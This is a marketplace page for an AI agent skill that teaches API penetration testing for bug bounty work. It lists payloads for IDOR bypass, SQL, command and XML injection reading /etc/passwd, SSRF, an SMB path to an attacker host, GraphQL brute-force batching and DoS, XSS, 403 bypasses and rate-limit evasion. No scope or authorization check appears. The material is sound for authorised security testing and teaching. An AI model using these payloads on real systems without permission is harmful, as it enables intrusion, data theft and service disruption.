How do I install API Fuzzing for Bug Bounty?

Install API Fuzzing for Bug Bounty with a single command: npx mdskills install sickn33/api-fuzzing-bug-bounty. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support API Fuzzing for Bug Bounty?

API Fuzzing for Bug Bounty works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

API Fuzzing for Bug Bounty

Name: API Fuzzing for Bug Bounty: AI Agent Skill
Rating: 8 (1 reviews)
Author: sickn33

Verified

SecurityIntermediate

This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques.

by @sickn330Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/api-fuzzing-bug-bounty

Fork & Edit

Skill Advisor8.0

Comprehensive API security testing guide with extensive techniques, payloads, and tooling for bug bounty hunters

+Covers REST, GraphQL, and SOAP with specific exploits and bypass techniques
+Provides actionable payloads and commands for IDOR, SQLi, XXE, and other vectors
+Includes extensive tool reference and troubleshooting guidance
-Lacks explicit trigger conditions for when agent should initiate testing vs guide user
-Over-scoped permissions for a skill that primarily provides guidance and techniques

SKILL.md

Edit in Browser

1---
2name: API Fuzzing for Bug Bounty
3description: This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# API Fuzzing for Bug Bounty
10 
11## Purpose
12 
13Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.
14 
15## Inputs/Prerequisites
16 
17- Burp Suite or similar proxy tool
18- API wordlists (SecLists, api_wordlist)
19- Understanding of REST/GraphQL/SOAP protocols
20- Python for scripting
21- Target API endpoints and documentation (if available)
22 
23## Outputs/Deliverables
24 
25- Identified API vulnerabilities
26- IDOR exploitation proofs
27- Authentication bypass techniques
28- SQL injection points
29- Unauthorized data access documentation
30 
31---
32 
33## API Types Overview
34 
35| Type | Protocol | Data Format | Structure |
36|------|----------|-------------|-----------|
37| SOAP | HTTP | XML | Header + Body |
38| REST | HTTP | JSON/XML/URL | Defined endpoints |
39| GraphQL | HTTP | Custom Query | Single endpoint |
40 
41---
42 
43## Core Workflow
44 
45### Step 1: API Reconnaissance
46 
47Identify API type and enumerate endpoints:
48 
49```bash
50# Check for Swagger/OpenAPI documentation
51/swagger.json
52/openapi.json
53/api-docs
54/v1/api-docs
55/swagger-ui.html
56 
57# Use Kiterunner for API discovery
58kr scan https://target.com -w routes-large.kite
59 
60# Extract paths from Swagger
61python3 json2paths.py swagger.json
62```
63 
64### Step 2: Authentication Testing
65 
66```bash
67# Test different login paths
68/api/mobile/login
69/api/v3/login
70/api/magic_link
71/api/admin/login
72 
73# Check rate limiting on auth endpoints
74# If no rate limit → brute force possible
75 
76# Test mobile vs web API separately
77# Don't assume same security controls
78```
79 
80### Step 3: IDOR Testing
81 
82Insecure Direct Object Reference is the most common API vulnerability:
83 
84```bash
85# Basic IDOR
86GET /api/users/1234 → GET /api/users/1235
87 
88# Even if ID is email-based, try numeric
89/?user_id=111 instead of /?user_id=user@mail.com
90 
91# Test /me/orders vs /user/654321/orders
92```
93 
94**IDOR Bypass Techniques:**
95 
96```bash
97# Wrap ID in array
98{"id":111} → {"id":[111]}
99 
100# JSON wrap
101{"id":111} → {"id":{"id":111}}
102 
103# Send ID twice
104URL?id=<LEGIT>&id=<VICTIM>
105 
106# Wildcard injection
107{"user_id":"*"}
108 
109# Parameter pollution
110/api/get_profile?user_id=<victim>&user_id=<legit>
111{"user_id":<legit_id>,"user_id":<victim_id>}
112```
113 
114### Step 4: Injection Testing
115 
116**SQL Injection in JSON:**
117 
118```json
119{"id":"56456"}                    → OK
120{"id":"56456 AND 1=1#"}           → OK  
121{"id":"56456 AND 1=2#"}           → OK
122{"id":"56456 AND 1=3#"}           → ERROR (vulnerable!)
123{"id":"56456 AND sleep(15)#"}     → SLEEP 15 SEC
124```
125 
126**Command Injection:**
127 
128```bash
129# Ruby on Rails
130?url=Kernel#open → ?url=|ls
131 
132# Linux command injection
133api.url.com/endpoint?name=file.txt;ls%20/
134```
135 
136**XXE Injection:**
137 
138```xml
139<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
140```
141 
142**SSRF via API:**
143 
144```html
145<object data="http://127.0.0.1:8443"/>
146<img src="http://127.0.0.1:445"/>
147```
148 
149**.NET Path.Combine Vulnerability:**
150 
151```bash
152# If .NET app uses Path.Combine(path_1, path_2)
153# Test for path traversal
154https://example.org/download?filename=a.png
155https://example.org/download?filename=C:\inetpub\wwwroot\web.config
156https://example.org/download?filename=\\smb.dns.attacker.com\a.png
157```
158 
159### Step 5: Method Testing
160 
161```bash
162# Test all HTTP methods
163GET /api/v1/users/1
164POST /api/v1/users/1
165PUT /api/v1/users/1
166DELETE /api/v1/users/1
167PATCH /api/v1/users/1
168 
169# Switch content type
170Content-Type: application/json → application/xml
171```
172 
173---
174 
175## GraphQL-Specific Testing
176 
177### Introspection Query
178 
179Fetch entire backend schema:
180 
181```graphql
182{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}
183```
184 
185**URL-encoded version:**
186 
187```
188/graphql?query={__schema{types{name,kind,description,fields{name}}}}
189```
190 
191### GraphQL IDOR
192 
193```graphql
194# Try accessing other user IDs
195query {
196  user(id: "OTHER_USER_ID") {
197    email
198    password
199    creditCard
200  }
201}
202```
203 
204### GraphQL SQL/NoSQL Injection
205 
206```graphql
207mutation {
208  login(input: {
209    email: "test' or 1=1--"
210    password: "password"
211  }) {
212    success
213    jwt
214  }
215}
216```
217 
218### Rate Limit Bypass (Batching)
219 
220```graphql
221mutation {login(input:{email:"a@example.com" password:"password"}){success jwt}}
222mutation {login(input:{email:"b@example.com" password:"password"}){success jwt}}
223mutation {login(input:{email:"c@example.com" password:"password"}){success jwt}}
224```
225 
226### GraphQL DoS (Nested Queries)
227 
228```graphql
229query {
230  posts {
231    comments {
232      user {
233        posts {
234          comments {
235            user {
236              posts { ... }
237            }
238          }
239        }
240      }
241    }
242  }
243}
244```
245 
246### GraphQL XSS
247 
248```bash
249# XSS via GraphQL endpoint
250http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}
251 
252# URL-encoded XSS
253http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E
254```
255 
256### GraphQL Tools
257 
258| Tool | Purpose |
259|------|---------|
260| GraphCrawler | Schema discovery |
261| graphw00f | Fingerprinting |
262| clairvoyance | Schema reconstruction |
263| InQL | Burp extension |
264| GraphQLmap | Exploitation |
265 
266---
267 
268## Endpoint Bypass Techniques
269 
270When receiving 403/401, try these bypasses:
271 
272```bash
273# Original blocked request
274/api/v1/users/sensitivedata → 403
275 
276# Bypass attempts
277/api/v1/users/sensitivedata.json
278/api/v1/users/sensitivedata?
279/api/v1/users/sensitivedata/
280/api/v1/users/sensitivedata??
281/api/v1/users/sensitivedata%20
282/api/v1/users/sensitivedata%09
283/api/v1/users/sensitivedata#
284/api/v1/users/sensitivedata&details
285/api/v1/users/..;/sensitivedata
286```
287 
288---
289 
290## Output Exploitation
291 
292### PDF Export Attacks
293 
294```html
295<!-- LFI via PDF export -->
296<iframe src="file:///etc/passwd" height=1000 width=800>
297 
298<!-- SSRF via PDF export -->
299<object data="http://127.0.0.1:8443"/>
300 
301<!-- Port scanning -->
302<img src="http://127.0.0.1:445"/>
303 
304<!-- IP disclosure -->
305<img src="https://iplogger.com/yourcode.gif"/>
306```
307 
308### DoS via Limits
309 
310```bash
311# Normal request
312/api/news?limit=100
313 
314# DoS attempt
315/api/news?limit=9999999999
316```
317 
318---
319 
320## Common API Vulnerabilities Checklist
321 
322| Vulnerability | Description |
323|---------------|-------------|
324| API Exposure | Unprotected endpoints exposed publicly |
325| Misconfigured Caching | Sensitive data cached incorrectly |
326| Exposed Tokens | API keys/tokens in responses or URLs |
327| JWT Weaknesses | Weak signing, no expiration, algorithm confusion |
328| IDOR / BOLA | Broken Object Level Authorization |
329| Undocumented Endpoints | Hidden admin/debug endpoints |
330| Different Versions | Security gaps in older API versions |
331| Rate Limiting | Missing or bypassable rate limits |
332| Race Conditions | TOCTOU vulnerabilities |
333| XXE Injection | XML parser exploitation |
334| Content Type Issues | Switching between JSON/XML |
335| HTTP Method Tampering | GET→DELETE/PUT abuse |
336 
337---
338 
339## Quick Reference
340 
341| Vulnerability | Test Payload | Risk |
342|---------------|--------------|------|
343| IDOR | Change user_id parameter | High |
344| SQLi | `' OR 1=1--` in JSON | Critical |
345| Command Injection | `; ls /` | Critical |
346| XXE | DOCTYPE with ENTITY | High |
347| SSRF | Internal IP in params | High |
348| Rate Limit Bypass | Batch requests | Medium |
349| Method Tampering | GET→DELETE | High |
350 
351---
352 
353## Tools Reference
354 
355| Category | Tool | URL |
356|----------|------|-----|
357| API Fuzzing | Fuzzapi | github.com/Fuzzapi/fuzzapi |
358| API Fuzzing | API-fuzzer | github.com/Fuzzapi/API-fuzzer |
359| API Fuzzing | Astra | github.com/flipkart-incubator/Astra |
360| API Security | apicheck | github.com/BBVA/apicheck |
361| API Discovery | Kiterunner | github.com/assetnote/kiterunner |
362| API Discovery | openapi_security_scanner | github.com/ngalongc/openapi_security_scanner |
363| API Toolkit | APIKit | github.com/API-Security/APIKit |
364| API Keys | API Guesser | api-guesser.netlify.app |
365| GUID | GUID Guesser | gist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18 |
366| GraphQL | InQL | github.com/doyensec/inql |
367| GraphQL | GraphCrawler | github.com/gsmith257-cyber/GraphCrawler |
368| GraphQL | graphw00f | github.com/dolevf/graphw00f |
369| GraphQL | clairvoyance | github.com/nikitastupin/clairvoyance |
370| GraphQL | batchql | github.com/assetnote/batchql |
371| GraphQL | graphql-cop | github.com/dolevf/graphql-cop |
372| Wordlists | SecLists | github.com/danielmiessler/SecLists |
373| Swagger Parser | Swagger-EZ | rhinosecuritylabs.github.io/Swagger-EZ |
374| Swagger Routes | swagroutes | github.com/amalmurali47/swagroutes |
375| API Mindmap | MindAPI | dsopas.github.io/MindAPI/play |
376| JSON Paths | json2paths | github.com/s0md3v/dump/tree/master/json2paths |
377 
378---
379 
380## Constraints
381 
382**Must:**
383- Test mobile, web, and developer APIs separately
384- Check all API versions (/v1, /v2, /v3)
385- Validate both authenticated and unauthenticated access
386 
387**Must Not:**
388- Assume same security controls across API versions
389- Skip testing undocumented endpoints
390- Ignore rate limiting checks
391 
392**Should:**
393- Add `X-Requested-With: XMLHttpRequest` header to simulate frontend
394- Check archive.org for historical API endpoints
395- Test for race conditions on sensitive operations
396 
397---
398 
399## Examples
400 
401### Example 1: IDOR Exploitation
402 
403```bash
404# Original request (own data)
405GET /api/v1/invoices/12345
406Authorization: Bearer <token>
407 
408# Modified request (other user's data)
409GET /api/v1/invoices/12346
410Authorization: Bearer <token>
411 
412# Response reveals other user's invoice data
413```
414 
415### Example 2: GraphQL Introspection
416 
417```bash
418curl -X POST https://target.com/graphql \
419  -H "Content-Type: application/json" \
420  -d '{"query":"{__schema{types{name,fields{name}}}}"}'
421```
422 
423---
424 
425## Troubleshooting
426 
427| Issue | Solution |
428|-------|----------|
429| API returns nothing | Add `X-Requested-With: XMLHttpRequest` header |
430| 401 on all endpoints | Try adding `?user_id=1` parameter |
431| GraphQL introspection disabled | Use clairvoyance for schema reconstruction |
432| Rate limited | Use IP rotation or batch requests |
433| Can't find endpoints | Check Swagger, archive.org, JS files |
434

Full transparency — inspect the skill content before installing.